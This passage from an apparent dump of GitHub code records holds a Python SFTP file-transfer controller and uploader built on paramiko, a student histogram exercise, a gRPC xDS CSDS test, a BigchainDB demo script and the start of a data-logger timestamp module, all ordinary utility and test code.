self.ftp.go_to_home(self.username)\n\n def toggle_hidden_files(self):\n self.hidden_files = not self.hidden_files\n\n def cwd_recode_path(self, path):\n self.ftp.cwd(path)\n if path.startswith('/'):\n self.work_dir_now = self.format_realpath(path)\n else:\n old_path = self.work_dir_now\n self.work_dir_now = self.format_realpath(os.path.join(old_path, path))\n\n def walk(self, ftp_file_path):\n old_path = self.work_dir_now\n if ftp_file_path:\n if ftp_file_path.startswith('/'):\n ftp_file_path = self.format_realpath(ftp_file_path)\n else:\n ftp_file_path = self.format_realpath(os.path.join(self.work_dir_now, ftp_file_path))\n self.cwd_recode_path(ftp_file_path)\n else:\n raise FileNotFoundError(ftp_file_path)\n detailed_file_list = self.get_detailed_file_list(True)\n file_list = self.get_file_list(detailed_file_list)\n for file_name, file_details in zip(file_list, detailed_file_list):\n r_fs = []\n r_fns = []\n pr = self.get_properties(file_details)\n file_name = pr[0]\n if file_name and file_name in ['.', '..']:\n continue\n if self.is_dir(file_details):\n r_fs.append(file_name)\n for root, fs, fns in self.walk(f\"{ftp_file_path}/{file_name}\"):\n yield root, fs, fns\n else:\n file_attribs, date_modified = pr[1], pr[2]\n r_fns.append((file_name, file_attribs, date_modified, int(pr[-1] if pr[-1] else 0)))\n yield ftp_file_path, r_fs, r_fns\n\n if ftp_file_path:\n self.cwd_recode_path(old_path)\n\n def get_detailed_file_list(self, ignore_hidden_files_flag=False):\n files = []\n for attr in self.ftp.listdir_attr():\n if (self.hidden_files is True or str(attr).split()[8][0] is not '.') or ignore_hidden_files_flag is True:\n files.append(str(attr))\n return files\n\n def get_file_list(self, detailed_file_list):\n self.max_len = 0\n self.max_len_name = ''\n file_list = []\n for x in detailed_file_list:\n # Remove details and append only the file name\n name = ' '.join(x.split()[8:])\n file_list.append(name)\n if (len(name) > self.max_len):\n self.max_len = len(name)\n self.max_len_name = name\n return file_list\n\n def get_detailed_search_file_list(self):\n return self.detailed_search_file_list\n\n def get_search_file_list(self):\n self.max_len = 0\n self.max_len_name = ''\n for name in self.search_file_list:\n if (len(name) > self.max_len):\n self.max_len = len(name)\n self.max_len_name = name\n return self.search_file_list\n\n def chmod(self, filename, permissions):\n self.ftp.chmod(filename, permissions)\n\n @staticmethod\n def format_realpath(path):\n if sys.platform == 'win32':\n res = str(os.path.realpath(path)).split(':', 1)[-1].replace('\\\\', '/')\n else:\n res = os.path.realpath(path)\n return res\n\n @staticmethod\n def format_path(path):\n if sys.platform == 'win32':\n res = str(path).replace('\\\\', '/')\n else:\n res = path\n return res\n\n def is_there(self, path):\n try:\n self.ftp.stat(path)\n return True\n except:\n return False\n\n def rename_dir(self, rename_from, rename_to):\n self.ftp.rename(rename_from, rename_to)\n\n def move_dir(self, rename_from, rename_to, status_command, replace_command):\n if (self.is_there(rename_to) is True):\n if (replace_command(rename_from, 'File/Folder exists in destination folder') is True):\n self.delete_dir(rename_to, status_command)\n else:\n return\n try:\n self.ftp.rename(rename_from, rename_to)\n status_command(rename_from, 'Moved')\n except:\n status_command(rename_from, 'Failed to move')\n raise\n\n def copy_file(self, file_dir, copy_from, file_size, status_command, replace_command):\n # Change to script's directory\n abspath = os.path.abspath(__file__)\n dname = os.path.dirname(abspath)\n os.chdir(dname)\n if not os.path.exists('copy_temps'):\n os.makedirs('copy_temps')\n os.chdir('copy_temps')\n # Save the current path so that we can copy later\n dir_path_to_copy = self.ftp.getcwd()\n # Change to the file's path and download it\n self.ftp.cwd(file_dir)\n self.download_file(copy_from, file_size, status_command, replace_command)\n # Change back to the saved path and upload it\n self.ftp.cwd(dir_path_to_copy)\n self.upload_file(copy_from, file_size, status_command, replace_command)\n # Delete the downloaded file\n os.remove(copy_from)\n status_command(copy_from, 'Deleted local file')\n\n def copy_dir(self, file_dir, copy_from, status_command, replace_command):\n # Change to script's directory\n abspath = os.path.abspath(__file__)\n dname = os.path.dirname(abspath)\n os.chdir(dname)\n if not os.path.exists('copy_temps'):\n os.makedirs('copy_temps')\n os.chdir('copy_temps')\n # Save the current path so that we can copy later\n dir_path_to_copy = self.ftp.getcwd()\n # Change to the file's path and download it\n self.ftp.cwd(file_dir)\n self.download_dir(copy_from, status_command, replace_command)\n # Change back to the saved path and upload it\n self.ftp.cwd(dir_path_to_copy)\n self.upload_dir(copy_from, status_command, replace_command)\n # Delete the downloaded folder\n shutil.rmtree(copy_from)\n status_command(copy_from, 'Deleting local directory')\n\n def delete_file(self, file_name, status_command):\n try:\n self.ftp.remove(file_name)\n status_command(file_name, 'Deleted')\n except:\n status_command(file_name, 'Failed to delete')\n raise\n\n def delete_dir(self, dir_name, status_command):\n # Go into the directory\n self.ftp.cwd(dir_name)\n # Get file lists\n try:\n detailed_file_list = self.get_detailed_file_list(True)\n except:\n status_command(dir_name, 'Failed to delete directory')\n raise\n file_list = self.get_file_list(detailed_file_list)\n for file_name, file_details in zip(file_list, detailed_file_list):\n # If directory\n if (self.is_dir(file_details)):\n self.delete_dir(file_name, status_command)\n # If file\n else:\n self.delete_file(file_name, status_command)\n # Go back to parent directory and delete it\n try:\n self.ftp.cwd('..')\n status_command(dir_name, 'Deleting directory')\n self.ftp.rmdir(dir_name)\n except:\n status_command(dir_name, 'Failed to delete directory')\n raise\n\n def upload_file(self, file_name, file_size, status_command, replace_command):\n # Function to update status\n def upload_progress(transferred, remaining):\n status_command(file_name, str(min(round((transferred / file_size) * 100, 8), 100)) + '%')\n\n # Check if the file is already present in ftp server\n if (self.is_there(file_name)):\n if (replace_command(file_name, 'File exists in destination folder') is False):\n return\n # Try to upload file\n try:\n status_command(file_name, 'Uploading')\n self.ftp.put(file_name, file_name, callback=upload_progress)\n status_command(None, 'newline')\n except:\n status_command(file_name, 'Upload failed')\n raise\n\n def upload_dir(self, dir_name, status_command, replace_command):\n # Change to directory\n os.chdir(dir_name)\n # Create directory in server and go inside\n try:\n if (not self.is_there(dir_name)):\n self.ftp.mkdir(dir_name)\n status_command(dir_name, 'Creating directory')\n else:\n status_command(dir_name, 'Directory exists')\n self.ftp.cwd(dir_name)\n except:\n status_command(dir_name, 'Failed to create directory')\n raise\n # Cycle through items\n for filename in os.listdir():\n # If file upload\n if (isfile(filename)):\n self.upload_file(filename, os.path.getsize(filename), status_command, replace_command)\n # If directory, recursive upload it\n else:\n self.upload_dir(filename, status_command, replace_command)\n\n # Got to parent directory\n self.ftp.cwd('..')\n os.chdir('..')\n\n def sftp_mkdir_p(self, remote_path):\n if remote_path == \"/\":\n # absolute path so change directory to root\n self.ftp.chdir(\"/\")\n return\n if remote_path == \"\":\n # top-level relative directory must exists\n return\n try:\n # sub-directory exists\n self.ftp.chdir(remote_path)\n except IOError:\n dirname, basename = os.path.split(remote_path.rstrip(\"/\"))\n self.sftp_mkdir_p(dirname)\n self.ftp.mkdir(basename)\n self.ftp.chdir(basename)\n\n def upload_file_to_some_where(\n self, local_path, remote_folder, remote_filename='',\n status_command=log_info, check_ftp_file_same=False, append_offset=0):\n # TODO 断点续传\n if not os.path.exists(local_path):\n raise SystemError(f'本地路径不存在:{local_path.__repr__()}')\n if not remote_folder:\n raise SystemError(f'远程路径错误:{remote_folder.__repr__()} {remote_filename}')\n if not remote_filename:\n remote_folder, remote_filename = os.path.split(remote_folder)\n\n if not remote_folder.startswith('/'):\n remote_folder = self.format_realpath(os.path.join(self.work_dir_now, remote_folder))\n remote_path = os.path.join(remote_folder, remote_filename)\n old_path = self.work_dir_now\n if remote_folder:\n # Create directory in server and go inside\n try:\n if (not self.is_there(remote_folder)):\n self.sftp_mkdir_p(remote_folder)\n status_command(remote_folder, 'Creating directory')\n else:\n status_command(remote_folder, 'Directory exists')\n self.ftp.cwd(remote_folder)\n except Exception as e:\n status_command(remote_folder, 'Failed to create directory')\n raise e\n\n self._upload_file_to_some_where(local_path, remote_path, status_command, check_ftp_file_same, append_offset)\n self.work_dir_now = old_path\n self.cwd_recode_path(old_path)\n\n def _upload_file_to_some_where(\n self, local_path, remote_path, status_command=log_info,\n check_ftp_file_same=False, append_offset=0, windows=1024 * 8 * 128):\n file_size = os.stat(local_path).st_size\n\n # Function to update status\n def upload_progress(transferred, remaining):\n status_command(local_path, str(min(round((transferred / file_size) * 100, 8), 100)) + '%')\n\n # Try to upload file\n try:\n status_command(local_path, 'Uploading')\n self.ftp.put(local_path, remote_path, callback=upload_progress)\n file_list = self.ftp.listdir(os.path.dirname(remote_path))\n remote_name = os.path.basename(remote_path)\n f_local = open(local_path)\n\n if remote_name in file_list:\n f_remote = self.ftp.open(remote_path, \"a\")\n stat = self.ftp.stat(remote_path)\n if check_ftp_file_same:\n f_remote_tmp = self.ftp.open(remote_path, \"r\")\n try:\n r_data = f_remote_tmp.read(windows)\n l_data = f_local.read(len(r_data))\n status_command(\n f\"正在检查远程sftp服务器已经存在的文件路径上传的文件和本地文件一致性:\\n\",\n f\"本地:{l_data[:70]}\\n远程:{r_data[:70]}\\n本地{len(l_data)}=?远程{len(r_data)}: {l_data == r_data}\")\n if l_data == r_data:\n self.is_same_file = True\n status_command(\n f\"文件开头800KB一致,准备开始断点续传,已经上传的文件大小:{stat.st_size / 1024 / 1024:.3f}MB\", )\n else:\n self.is_same_file = False\n raise SystemError(f'远程文件路径[\"{self}{remote_path}:1\"]已存在,而且本地文件开头800KB与服务器文件不一致,请检查')\n raise StopIteration('只是检查文件开头一致性,不需要全部下载')\n finally:\n f_remote_tmp.close()\n\n stat = self.ftp.stat(remote_path)\n f_local.seek(stat.st_size)\n if append_offset:\n f_remote.seek(append_offset)\n else:\n f_remote = self.ftp.open(remote_path, \"w\")\n\n tmp_buffer = f_local.read(windows)\n while tmp_buffer:\n f_remote.write(tmp_buffer)\n tmp_buffer = f_local.read(windows)\n f_remote.close()\n f_local.close()\n status_command(None, 'newline')\n except Exception as e:\n status_command(remote_path, f'Upload failed [{type(e)}] {e}')\n raise e\n\n def download_file(self, ftp_file_name, file_size, status_command, replace_command):\n # Function to update progress\n def download_progress(transferred, remaining):\n status_command(ftp_file_name, str(min(round((transferred / file_size) * 100, 8), 100)) + '%')\n\n # Check if the file is already present in local directory\n if isfile(ftp_file_name):\n if replace_command(ftp_file_name, 'File exists in destination folder') is False:\n return\n # Try to download file\n try:\n status_command(ftp_file_name, 'Downloading')\n self.ftp.get(ftp_file_name, ftp_file_name, callback=download_progress)\n status_command(None, 'newline')\n except Exception:\n status_command(ftp_file_name, 'Download failed')\n raise\n\n def download_dir(self, ftp_dir_name, status_command, replace_command):\n # Create local directory\n try:\n if not os.path.isdir(ftp_dir_name):\n os.makedirs(ftp_dir_name)\n status_command(ftp_dir_name, 'Created local directory')\n else:\n status_command(ftp_dir_name, 'Local directory exists')\n os.chdir(ftp_dir_name)\n except Exception:\n status_command(ftp_dir_name, 'Failed to create local directory')\n raise\n # Go into the ftp directory\n self.ftp.cwd(ftp_dir_name)\n # Get file lists\n detailed_file_list = self.get_detailed_file_list(True)\n file_list = self.get_file_list(detailed_file_list)\n for file_name, file_details in zip(file_list, detailed_file_list):\n # If directory\n if (self.is_dir(file_details)):\n self.download_dir(file_name, status_command, replace_command)\n # If file\n else:\n self.download_file(file_name, int(self.get_properties(file_details)[3]), status_command,\n replace_command)\n # Got to parent directory\n self.ftp.cwd('..')\n os.chdir('..')\n\n def get_size(self, ftp_file_name):\n res = int(self.ftp.stat(ftp_file_name).st_size) or 0\n return res\n\n def _download_file_to_some_where( self, ftp_file_name, local_path,\n file_size, status_command):\n # Function to update progress\n def download_progress(transferred, remaining):\n status_command(ftp_file_name, str(min(round((transferred / file_size) * 100, 8), 100)) + '%')\n\n # Try to download file\n try:\n status_command(ftp_file_name, 'Downloading')\n self.ftp.get(ftp_file_name, local_path, callback=download_progress)\n status_command(None, 'newline')\n except Exception as e:\n status_command(ftp_file_name, 'Download failed')\n raise e\n\n def download_file_to_some_where(self, ftp_file_name, local_path, local_file_name='',\n file_size=0, status_command=log_info, replace_command=log_info):\n if not local_path:\n raise SystemError(f'路径错误:{local_path.__repr__()}')\n if isfile(ftp_file_name):\n if replace_command(ftp_file_name, 'File exists in destination folder') is False:\n return\n # Try to open file, if fails return\n if not local_file_name:\n local_file_name = os.path.basename(ftp_file_name)\n\n makedirs(local_path, check_dot=False)\n local_path = self.format_path(os.path.join(local_path, local_file_name))\n\n if not file_size:\n file_size = self.get_size(ftp_file_name)\n\n self._download_file_to_some_where(ftp_file_name, local_path, file_size, status_command)\n return local_path\n\n def search(self, dir_name, status_command, search_file_name):\n # Go into the ftp directory\n self.ftp.cwd(dir_name)\n # Get file lists\n detailed_file_list = self.get_detailed_file_list()\n file_list = self.get_file_list(detailed_file_list)\n for file_name, file_details in zip(file_list, detailed_file_list):\n # If file_name matches the keyword, append it to search list\n if search_file_name.lower() in file_name.lower():\n if (self.ftp.getcwd() == '/'):\n dir = ''\n else:\n dir = self.ftp.getcwd()\n self.search_file_list.append(dir + '/' + file_name)\n self.detailed_search_file_list.append(file_details)\n status_command(dir + '/' + file_name, 'Found')\n # If directory, search it\n if (self.is_dir(file_details)):\n status_command(file_name, 'Searching directory')\n self.search(file_name, status_command, search_file_name)\n # Goto to parent directory\n self.ftp.cwd('..')\n\n def clear_search_list(self):\n del self.search_file_list[:]\n del self.detailed_search_file_list[:]\n\n def get_dir_size(self, dir_name):\n size = 0;\n # Go into the ftp directory\n self.ftp.cwd(dir_name)\n # Get file lists\n detailed_file_list = self.get_detailed_file_list()\n file_list = self.get_file_list(detailed_file_list)\n for file_name, file_details in zip(file_list, detailed_file_list):\n if (self.is_dir(file_details)):\n size += self.get_dir_size(file_name)\n else:\n size += int(self.get_properties(file_details)[3])\n # Goto to parent directory\n self.ftp.cwd('..')\n # return size\n return size\n\n def cwd_parent(self, name):\n if ('/' not in name): return name\n parent_name = '/'.join(name.split('/')[:-1])\n if (parent_name == ''): parent_name = '/'\n self.ftp.cwd(parent_name)\n return ''.join(name.split('/')[-1:])\n\n def mkd(self, name):\n self.ftp.mkdir(name)\n\n def pwd(self):\n return (self.ftp.getcwd())\n\n def get_properties(self, file_details):\n details_list = file_details.split()\n # Get file attributes\n file_attribs = details_list[0]\n # Get date modified\n date_modified = ' '.join(details_list[5:8])\n # Remove the path from the name\n file_name = ' '.join(details_list[8:])\n # Get size if it is not a directory\n if ('d' not in file_details[0]):\n file_size = details_list[4]\n return [file_name, file_attribs, date_modified, file_size]\n else:\n return [file_name, file_attribs, date_modified]\n\n def is_dir(self, file_details):\n return 'd' in file_details[0]\n\n def disconnect(self):\n if self.ftp:\n self.ftp.close()\n\n\nclass ParamikoFolderUploader(object):\n \"\"\"\n paramoki 实现的文件夹上传\n \"\"\"\n\n def __init__(self, host, port, user, password, local_dir: str, remote_dir: str,\n path_pattern_exluded_tuple=('/.git/', '/.idea/', '/dist/', '/build/'),\n file_suffix_tuple_exluded=('.pyc', '.log', '.gz'),\n only_upload_within_the_last_modify_time=3650 * 24 * 60 * 60,\n file_volume_limit=1000 * 1000, sftp_log_level=20):\n \"\"\"\n :param host:\n :param port:\n :param user:\n :param password:\n :param local_dir:\n :param remote_dir:\n :param path_pattern_exluded_tuple: 命中了这些正则的直接排除\n :param file_suffix_tuple_exluded: 这些结尾的文件排除\n :param only_upload_within_the_last_modify_time: 仅仅上传最近多少天修改的文件\n :param file_volume_limit: 大于这个体积的不上传,单位b。\n \"\"\"\n self._host = host\n self._port = port\n self._user = user\n self._password = password\n\n self._local_dir = str(local_dir).replace('\\\\', '/')\n if not self._local_dir.endswith('/'):\n self._local_dir += '/'\n self._remote_dir = str(remote_dir).replace('\\\\', '/')\n if not self._remote_dir.endswith('/'):\n self._remote_dir += '/'\n self._path_pattern_exluded_tuple = path_pattern_exluded_tuple\n self._file_suffix_tuple_exluded = file_suffix_tuple_exluded\n self._only_upload_within_the_last_modify_time = only_upload_within_the_last_modify_time\n self._file_volume_limit = file_volume_limit\n\n # noinspection PyTypeChecker\n t = paramiko.Transport((host, port))\n t.connect(username=user, password=password)\n self.sftp = paramiko.SFTPClient.from_transport(t)\n\n ssh = paramiko.SSHClient()\n ssh.load_system_host_keys()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(host, port=port, username=user, password=password, compress=True)\n self.ssh = ssh\n\n def _judge_need_filter_a_file(self, filename: str):\n ext = filename.split('.')[-1]\n if '.' + ext in self._file_suffix_tuple_exluded:\n return True\n for path_pattern_exluded in self._path_pattern_exluded_tuple:\n # print(path_pattern_exluded,filename)\n if re.search(path_pattern_exluded, filename):\n return True\n file_st_mtime = os.stat(filename).st_mtime\n volume = os.path.getsize(filename)\n if time.time() - file_st_mtime > self._only_upload_within_the_last_modify_time:\n return True\n if volume > self._file_volume_limit:\n return True\n return False\n\n def _make_dir(self, dirc, final_dir):\n \"\"\"\n sftp.mkdir 不能直接越级创建深层级文件夹。\n :param dirc:\n :param final_dir:\n :return:\n \"\"\"\n # print(dir,final_dir)\n try:\n self.sftp.mkdir(dirc)\n if dirc != final_dir:\n self._make_dir(final_dir, final_dir)\n except (FileNotFoundError,):\n parrent_dir = os.path.split(dirc)[0]\n self._make_dir(parrent_dir, final_dir)\n\n def upload(self):\n for parent, dirnames, filenames in os.walk(self._local_dir):\n for filename in filenames:\n file_full_name = os.path.join(parent, filename).replace('\\\\', '/')\n if not self._judge_need_filter_a_file(file_full_name):\n remote_full_file_name = re.sub(f'^{self._local_dir}', self._remote_dir, file_full_name)\n try:\n logger.debug(f'正在上传文件,本地:{file_full_name} --> 远程: {remote_full_file_name}')\n self.sftp.put(file_full_name, remote_full_file_name)\n except (FileNotFoundError,) as e:\n # self.logger.warning(remote_full_file_name)\n self._make_dir(os.path.split(remote_full_file_name)[0], os.path.split(remote_full_file_name)[0])\n self.sftp.put(file_full_name, remote_full_file_name)\n else:\n if '/.git' not in file_full_name and '.pyc' not in file_full_name:\n logger.debug(f'根据过滤规则,不上传这个文件 {file_full_name}')\n\n\nclass SftpClientStore(midhardware.BaseStore):\n def __init__(\n self, host, port, user, password, location='/', tmp_path='ftp_data_tmp',\n download_check_ftp_file_same=False, upload_check_ftp_file_same=False):\n self._host = host\n self._port = port\n self._user = user\n self._password = password\n\n self.tmp_path = tmp_path\n self.location = str(location).replace('\\\\', '/')\n if not self.location.endswith('/'):\n self.location += '/'\n\n self.client = SftpController(host, port, user, password)\n self.client.connect_until_success()\n self.client.sftp_mkdir_p(self.location)\n self.client.ftp.cwd(self.location)\n self.client.work_dir_now = self.location\n\n self.upload_check_ftp_file_same = upload_check_ftp_file_same\n self.download_check_ftp_file_same = download_check_ftp_file_same\n\n def count_data(self, data_type=None, *args, **kwargs):\n return NotImplementedError\n\n def list_data(self, data_type=None, location=None, *args, **kwargs):\n for root, fs, fns in self.client.walk(location or self.location):\n for fn, file_attribs, date_modified, size in fns:\n yield {\n 'root': root,\n 'filename': fn,\n 'attribs': file_attribs,\n 'modified': date_modified,\n 'size': int(size),\n \"realpath\": self.client.format_realpath(os.path.join(root, fn))\n }\n\n def check_data(self, position, data_type=None, *args, **kwargs):\n return NotImplementedError\n\n def get_data(self, position: typing.Union[str, dict], data_type=None, *args, **kwargs):\n \"\"\"\n position 远程文件名\n self.tmp_path 本地文件夹路径\n self.location 远程文件夹路径\n \"\"\"\n file_name = None\n file_size = 0\n if isinstance(position, str):\n file_name = self.client.format_path(os.path.join(self.location, position))\n elif isinstance(position, dict):\n file_name = position['realpath']\n file_size = position['size']\n if file_name:\n return self.client.download_file_to_some_where(\n file_name,\n self.tmp_path,\n file_size=file_size\n )\n\n def save_data(self, position: str, data, data_type=None, append_offset=0, *args, **kwargs):\n return self.client.upload_file_to_some_where(\n data,\n self.location,\n position,\n check_ftp_file_same=self.upload_check_ftp_file_same,\n append_offset=append_offset\n )\n\n def delete_data(self, position, data_type=None, *args, **kwargs):\n return NotImplementedError\n\n def get_position(self, position, data_type=None, *args, **kwargs):\n return NotImplementedError\n\n def get_data_size(self, position, data_type=None, *args, **kwargs):\n return NotImplementedError\n\n def check_self(self, *args, **kwargs):\n return NotImplementedError\n\n def save_self(self, *args, **kwargs):\n return NotImplementedError\n\n def free_self(self, *args, **kwargs):\n return NotImplementedError\n\n\nif __name__ == '__main__':\n __fs = SftpClientStore('192.168.0.111', 57522, 'test', '1234qwer!@#$QWER', '/home/test', 'data')\n\n for __f in __fs.list_data():\n print(__f)\n # res = __fs.get_data('mysql2ftp_0424_1650809830.csv')\n res = __fs.save_data('mysql2ftp_0424_1650809830.csv','data/mysql2ftp_0424_1650809830.csv')\n","repo_name":"DJMIN/D2D","sub_path":"d22d/model/sftpmodel.py","file_name":"sftpmodel.py","file_ext":"py","file_size_in_byte":31745,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"8"} +{"seq_id":"22294469578","text":"from a2exo1 import val_max\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nLISTE = [0, 3, 10, 4, 8, 1, 0]\nLISTE2 = [0,1,2,3,4]\n\n\ndef histo(F) -> list:\n \"\"\"Crée un histogrammede la liste F\n\n Args:\n F (list): Liste d'entiers\n\n Returns:\n list: L'histogramme\n \"\"\"\n \n NB = max(F)+1 \n H = [0] * NB\n for a in range(len(H)):\n for j in range(len(F)):\n if F[j] == a:\n H[a] += 1\n return H\n \ndef est_injective(F) -> bool:\n \"\"\"Indique si f:F --> H est injective ou non\n\n Args:\n F (list): liste d'entiers\n\n Returns:\n bool\n \"\"\"\n H = histo(F)\n for i in H:\n if i > 1:\n return False\n return True\n\n\ndef est_surjective(F) -> bool:\n \"\"\"Indique si f:F --> H est surjective ou non\n\n Args:\n F (list): liste d'entiers\n\n Returns:\n bool\n \"\"\"\n H = histo(F)\n for i in H:\n if i == 0:\n return False\n return True\n\n\ndef est_bijective(F) -> bool:\n \"\"\"Indique si f:F --> H est bijective ou non\n\n Args:\n F (list): liste d'entiers\n\n Returns:\n bool\n \"\"\"\n return est_injective(F) == True and est_surjective(F) == True\n\n\ndef affiche_histo(F):\n \"\"\"Affiche dans la console l'histogramme de la liste F\n\n Args:\n F (list): Liste d'entiers\n \"\"\"\n H = histo(F)\n MAXOCC = val_max(H)\n for i in range(MAXOCC, -1, -1):\n for j in range(0, len(H), 1):\n if H[j] > i:\n print(\" # |\", end='')\n else:\n print(\" |\", end='')\n print(\"\\n\")\n for b in range(max(F) + 1):\n print(f\" {b} |\", end='')\n fig, ax = plt.subplots()\n ax.hist(F)\n plt.show()\n\ndef test_exo4():\n print(histo(LISTE2))\n print(est_injective(LISTE2))\n print(est_surjective(LISTE2))\n print(est_bijective(LISTE2))\n\ntest_exo4()\naffiche_histo(LISTE)","repo_name":"Vietco311/L3","sub_path":"Python/Atelier 2/a2exo4.py","file_name":"a2exo4.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"25589031014","text":"import logging\nfrom typing import Tuple\n\nfrom absl import flags\nfrom absl.testing import absltest\n\nfrom framework import xds_url_map_testcase\nfrom framework.helpers import skips\nfrom framework.test_app import client_app\n\n# Type aliases\nHostRule = xds_url_map_testcase.HostRule\nPathMatcher = xds_url_map_testcase.PathMatcher\nGcpResourceManager = xds_url_map_testcase.GcpResourceManager\nDumpedXdsConfig = xds_url_map_testcase.DumpedXdsConfig\nRpcTypeUnaryCall = xds_url_map_testcase.RpcTypeUnaryCall\nRpcTypeEmptyCall = xds_url_map_testcase.RpcTypeEmptyCall\nXdsTestClient = client_app.XdsTestClient\n_Lang = skips.Lang\n\nlogger = logging.getLogger(__name__)\nflags.adopt_module_key_flags(xds_url_map_testcase)\n\n_NUM_RPCS = 50\n\n\nclass TestBasicCsds(xds_url_map_testcase.XdsUrlMapTestCase):\n @staticmethod\n def is_supported(config: skips.TestConfig) -> bool:\n if config.client_lang == _Lang.NODE:\n return config.version_gte(\"v1.5.x\")\n return True\n\n @staticmethod\n def url_map_change(\n host_rule: HostRule, path_matcher: PathMatcher\n ) -> Tuple[HostRule, PathMatcher]:\n return host_rule, path_matcher\n\n def xds_config_validate(self, xds_config: DumpedXdsConfig):\n # Validate Endpoint Configs\n self.assertNumEndpoints(xds_config, 1)\n # Validate Node\n self.assertEqual(\n self.test_client.ip, xds_config[\"node\"][\"metadata\"][\"INSTANCE_IP\"]\n )\n # Validate Listeners\n self.assertIsNotNone(xds_config.lds)\n self.assertEqual(self.hostname(), xds_config.lds[\"name\"])\n # Validate Route Configs\n self.assertTrue(xds_config.rds[\"virtualHosts\"])\n # Validate Clusters\n self.assertEqual(1, len(xds_config.cds))\n self.assertEqual(\"EDS\", xds_config.cds[0][\"type\"])\n\n def rpc_distribution_validate(self, test_client: XdsTestClient):\n rpc_distribution = self.configure_and_send(\n test_client,\n rpc_types=[RpcTypeUnaryCall, RpcTypeEmptyCall],\n num_rpcs=_NUM_RPCS,\n )\n self.assertEqual(_NUM_RPCS, rpc_distribution.num_oks)\n\n\nif __name__ == \"__main__\":\n absltest.main()\n","repo_name":"grpc/grpc","sub_path":"tools/run_tests/xds_k8s_test_driver/tests/url_map/csds_test.py","file_name":"csds_test.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":39468,"dataset":"github-code","pt":"90"} +{"seq_id":"23859567993","text":"import time\nfrom bigchaindb import Bigchain\n\n# env\n#\nb = Bigchain()\n\n\n# lib\n#\ndef sign_and_write(tx, private_key):\n tx_signed = b.sign_transaction(tx, private_key)\n b.write_transaction(tx_signed)\n return tx_signed\n\n# setup\n#\npvt_key, pub_key = b.generate_keys()\npvt_key2, pub_key2 = b.generate_keys()\n\nprint(\"Public Key:\", pub_key, \"\\n\")\n\n\n# init\n#\n#\n# db initialization\n# first transaction - asset creation - required, asset logic not used for our use-case: storing arbitrary data\nprint(\"DB init - first TX:\")\nasset_payload = {'msg': 'Arbitrary data asset'}\ntx = b.create_transaction(b.me, pub_key, None, 'CREATE', payload=asset_payload)\ntx_signed = sign_and_write(tx, b.me_private)\nprint(\"TX:\", tx_signed, \"\\n\")\n\ntime.sleep(8) # bigchaindb takes a couple of seconds to confirm a transaction\ntx_retrieved = b.get_transaction(tx_signed['id'])\nprint(\"TX retrieved:\", tx_retrieved, \"\\n\")\n\n\n# main\n#\nprint(\"\\n\\nData TX:\")\ndata = { \"amount\": 123, \"date\": \"2016-01-01\" } # <---- arbitrary data, can be encrypted with ecies, ownership based on transaction signer (public key)\ntx2 = b.create_transaction(pub_key, pub_key, tx_retrieved['id'], 'TRANSFER', data)\ntx_signed = sign_and_write(tx2, pvt_key)\nprint(\"TX:\", tx_signed, \"\\n\")\n\ntime.sleep(8)\ntx_retrieved = b.get_transaction(tx_signed['id'])\nprint(\"TX retrieved:\", tx_retrieved, \"\\n\")\n\n\n# http://localhost:8080/#dataexplorer\n#\n# all blocks:\n# r.db('bigchain').table('bigchain')\n#\n# last block:\n# r.db('bigchain').table('bigchain').orderBy(r.desc('block_number')).limit(1)\n#\n#\n# will list everything\n","repo_name":"makevoid/try_bigchaindb","sub_path":"try_bigchaindb.py","file_name":"try_bigchaindb.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"9776511460","text":"import csv # CSV_Writer\nfrom datetime import datetime # CSV_Data\nimport os # CSV_Writer\nfrom shutil import copyfile\nimport sys # CSV_Writer\nimport threading\nimport queue\nimport time # Writer Thread\nimport math\nimport locale\n\nif 'merged_data_logger_modules' not in globals():\n from brickv.data_logger.event_logger import EventLogger\n\ndef utf8_strftime(timestamp, fmt):\n return datetime.fromtimestamp(timestamp).strftime(fmt)\n\ndef timestamp_to_de(timestamp):\n return utf8_strftime(timestamp, '%d.%m.%Y %H:%M:%S')\n\ndef timestamp_to_de_msec(timestamp):\n return timestamp_to_de(timestamp) + ',' + ('%.3f' % math.modf(timestamp)[0])[2:]\n\ndef timestamp_to_us(timestamp):\n return utf8_strftime(timestamp, '%m/%d/%Y %H:%M:%S')\n\ndef timestamp_to_us_msec(timestamp):\n return timestamp_to_us(timestamp) + '.' + ('%.3f' % math.modf(timestamp)[0])[2:]\n\ndef timestamp_to_iso(timestamp, milli=False):\n \"\"\"\n Format a timestamp in ISO 8601 standard\n ISO 8601 = YYYY-MM-DDThh:mm:ss.fff+tz:tz\n 2014-09-10T14:12:05.563+02:00\n \"\"\"\n\n if time.localtime().tm_isdst and time.daylight:\n offset = -time.altzone / 60\n else:\n offset = -time.timezone / 60\n\n tz = '%02d:%02d' % (abs(offset) / 60, abs(offset) % 60)\n\n if offset < 0:\n tz = '-' + tz\n else:\n tz = '+' + tz\n\n if milli:\n ms = '.' + ('%.3f' % math.modf(timestamp)[0])[2:]\n else:\n ms = ''\n\n return utf8_strftime(timestamp, '%Y-%m-%dT%H:%M:%S') + ms + tz\n\ndef timestamp_to_iso_msec(timestamp):\n return timestamp_to_iso(timestamp, True)\n\ndef timestamp_to_unix(timestamp):\n return str(int(timestamp))\n\ndef timestamp_to_unix_msec(timestamp):\n return '%.3f' % timestamp\n\ndef timestamp_to_strftime(timestamp, time_format):\n try:\n return utf8_strftime(timestamp, time_format)\n except Exception as e:\n return 'Error: ' + str(e).replace('\\n', ' ')\n\nclass DataLoggerException(Exception):\n # Error Codes\n DL_MISSING_ARGUMENT = -1 # Missing Arguments in Config File\n DL_FAILED_VALIDATION = -2 # Validation found errors in the configuration file\n DL_CRITICAL_ERROR = -42 # For all other critical errors\n\n def __init__(self, err_code=DL_CRITICAL_ERROR, desc=\"No Description!\"):\n self.value = err_code\n self.description = desc\n\n def __str__(self):\n return str(\"ERROR[DL\" + str(self.value) + \"]: \" + str(self.description))\n\n\n'''\n/*---------------------------------------------------------------------------\n CSVData\n ---------------------------------------------------------------------------*/\n '''\n\n\nclass CSVData:\n 